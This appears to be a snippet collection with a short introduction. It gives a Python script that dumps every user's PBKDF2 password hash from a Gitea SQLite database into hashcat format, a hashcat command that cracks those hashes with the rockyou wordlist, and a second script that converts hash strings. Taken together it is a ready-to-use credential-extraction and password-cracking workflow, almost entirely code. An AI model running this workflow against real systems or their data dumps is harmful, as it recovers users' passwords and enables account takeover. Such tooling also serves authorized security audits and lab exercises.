pbkdf2

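Convert the PBKDF2 password hashes stored in a Gitea SQLite database from hex to base64, producing one `name:sha256:iterations:salt:hash` line per user.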

import sqlite3
import base64
import binascii
import hashlib

# Path of the SQLite file that main() opens, relative to the working directory.
DB_FILE = "data.db"

# Pulls three columns from the "user" table for every row: the stored password
# hash and its salt (both are hex-decoded by pbkdf2_format) and the account name.
QUERY = "SELECT passwd, salt, name FROM user;"

def pbkdf2_format(passwd_hex, salt_hex, iterations, name):
    """Build one ``name:sha256:iterations:salt:hash`` line from hex-encoded fields.

    ``passwd_hex`` (the stored password hash) and ``salt_hex`` are decoded from
    hex and re-encoded as base64. ``iterations`` and ``name`` are interpolated
    as given, and the digest label is always the literal ``sha256``.

    Raises whatever ``binascii.unhexlify`` raises when a field is not valid hex.
    """

    def hex_to_b64(hex_text):
        # hex text -> raw bytes -> base64 text
        return base64.b64encode(binascii.unhexlify(hex_text)).decode()

    # The hash is decoded before the salt, so a malformed hash is reported first.
    encoded_hash = hex_to_b64(passwd_hex)
    encoded_salt = hex_to_b64(salt_hex)

    return f"{name}:sha256:{iterations}:{encoded_salt}:{encoded_hash}"

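def main():
    """Export every row returned by QUERY as a formatted hash line.

    Opens DB_FILE, runs QUERY, converts each (passwd, salt, name) row with
    pbkdf2_format, then prints each line and writes it to ``hashes.txt`` in the
    current directory, overwriting any existing file.
    """
    conn = sqlite3.connect(DB_FILE)
    try:
        users = conn.execute(QUERY).fetchall()
    finally:
        # Release the database handle even when the query fails
        # (for example when the file has no "user" table).
        conn.close()

    # hashes.txt receives a password hash for every row and is created with the
    # process's default file permissions, so it is credential material and
    # should be stored and cleaned up accordingly.
    with open("hashes.txt", "w", encoding="utf-8") as f:
        for passwd, salt, name in users:
            # NOTE(review): the iteration count is fixed at 50000 for every row
            # and is not read from the database; confirm it matches how the
            # stored hashes were produced.
            formatted_hash = pbkdf2_format(passwd, salt, 50000, name)
            print(formatted_hash)
            f.write(formatted_hash + "\n")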

# Run the export only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()

Use hashcat to crack the hashes written to hashes.txt:

# Input is the hashes.txt written by the script above: one
# name:sha256:iterations:salt:hash line per account.
# --user is presumably the abbreviated form of hashcat's --username option, which
# makes hashcat skip the leading name field of each line; confirm for your version.
# A wordlist run only recovers passwords that appear in the list.
hashcat hashes.txt /usr/share/wordlists/rockyou.txt --user

#!/usr/bin/env python3

import base64
import sys

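def convert_hash(h):
    """Rewrite a ``label:digest:iterations$salt$hexhash`` string as
    ``digest:iterations:salt_b64:hash_b64``.

    The text after the last ``:`` is split on ``$`` into the iteration count,
    the salt and the hex-encoded hash (any further ``$`` fields are ignored).
    The salt is treated as literal text and base64-encoded as is; the hash is
    decoded from hex and then base64-encoded. The digest name is the second
    ``:``-separated label of the input.

    Raises:
        ValueError: if fewer than two labels precede the last ``:``, if the
            final part has fewer than three ``$`` fields, or if the hash is
            not valid hex.
    """
    prefix, sep, tail = h.rpartition(':')
    labels = prefix.split(':') if sep else []
    if len(labels) < 2:
        # Without this check the digest lookup below fails with a bare IndexError.
        raise ValueError('expected at least two ":"-separated labels before the hash part')

    fields = tail.split('$')
    if len(fields) < 3:
        raise ValueError('expected iterations$salt$hash after the last ":"')
    iterations, salt, sha = fields[:3]

    # Salt: literal text, base64-encoded without any decoding step.
    salt_base64 = base64.b64encode(salt.encode()).decode()

    # Hash: hex text -> raw bytes -> base64 text.
    hash_base64 = base64.b64encode(bytes.fromhex(sha)).decode()

    return f'{labels[1]}:{iterations}:{salt_base64}:{hash_base64}'


if __name__ == '__main__':
    # All command-line arguments are concatenated with no separator.
    h = ''.join(sys.argv[1:])

    if not h.strip():
        print('please provide the hash', file=sys.stderr)
        # sys.exit instead of the site-provided exit(), which is not always available.
        sys.exit(1)

    try:
        print(convert_hash(h))
    except ValueError as err:
        print(f'cannot convert hash: {err}', file=sys.stderr)
        sys.exit(1)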
